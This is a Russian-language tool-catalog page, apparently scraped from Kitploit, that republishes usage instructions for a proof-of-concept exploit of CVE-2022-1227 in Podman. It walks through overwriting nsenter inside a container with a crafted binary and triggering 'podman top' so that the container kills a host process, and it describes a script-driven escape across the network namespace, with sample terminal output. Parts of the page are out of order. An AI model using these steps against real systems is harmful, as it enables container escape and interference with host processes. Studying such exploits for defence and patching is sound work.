Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-1227_Exploit — Скрипт для эксплуатации CVE-2022-1227 | Kitploit
Инструменты/GitHubGitHub/louisliunova/cve-2022-1227_exploit
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingПобег из Контейнера
GitHublouisliunova/cve-2022-1227_exploit

CVE-2022-1227_Exploit

Скрипт для эксплуатации CVE-2022-1227

Репозиторий
143 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-1227_Exploit

Скрипт для эксплуатации CVE-2022-1227.

Предыстория

  • Рекомендуется Ubuntu 20.10.
  • Рекомендуется Podman <4.0.0; 3.4.4.

TODO: добавить описание принципа данной уязвимости

Установка podman

Следуйте инструкциям из официальной документации: https://podman.io/getting-started/installation#installing-on-linux

Для Ubuntu 20.10 команда установки должна быть такой:

root@kitploit:~
sudo apt-get install podman=3.4.4+ds1-1ubuntu1

Быстрый старт

Простой эксплойт

В этом разделе мы попробуем простой PoC, чтобы нарушить границу PID namespace и kill процесс на хосте.

Вот шаги:

  1. Запустите контейнер следующей командой: podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity

  2. Запустите keep из ./exp/bin и получите PID, под которым он работает. Обычно он выводит свой PID в терминал. Так как бинарный файл настроен на ожидание в течение 600 секунд, возможно, вам нужно быстро выполнить следующие шаги.

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
    My process ID is: 7719
    Put this number to `PID` in the sendsig.c and compile!
    
  3. Отредактируйте исходный код в ./exp/src/sendsig.c и подставьте PID, полученный на предыдущем шаге, в переменную pid.

    root@kitploit:~
    int pid = OLD_VAL;
    

    на

    root@kitploit:~
    int pid = 7719;
    
  4. Поместите скомпилированный бинарный файл внутрь podman: podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter

Полный эксплойт

В этом разделе мы используем сокеты для организации межпроцессного взаимодействия между клиентом в контейнере и сервером на хосте, что обычно невозможно при полной изоляции. Мы используем эту уязвимость, чтобы преодолеть изоляцию сетевого пространства имён и реализовать этот эксплойт.

Сначала перейдите в каталог с помощью cd ./exp;

Просто запустив ./exploit.sh, вы выполните всё автоматически; если всё пройдёт успешно, сервер выведет:

root@kitploit:~
Hello from the container!

Это означает, что мы пересекли сетевое пространство имён и совершили побег.

Скачать инструмент
  • Запустите podman top, чтобы вызвать уязвимость: podman top -l

  • Если всё прошло правильно, работающий процесс keep будет немедленно убит. Это необычно, потому что в обычных условиях процессы внутри контейнера не могут отправлять сигналы процессам на хосте из-за изоляции пространства имён PID.

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
    My process ID is: 7719
    Killed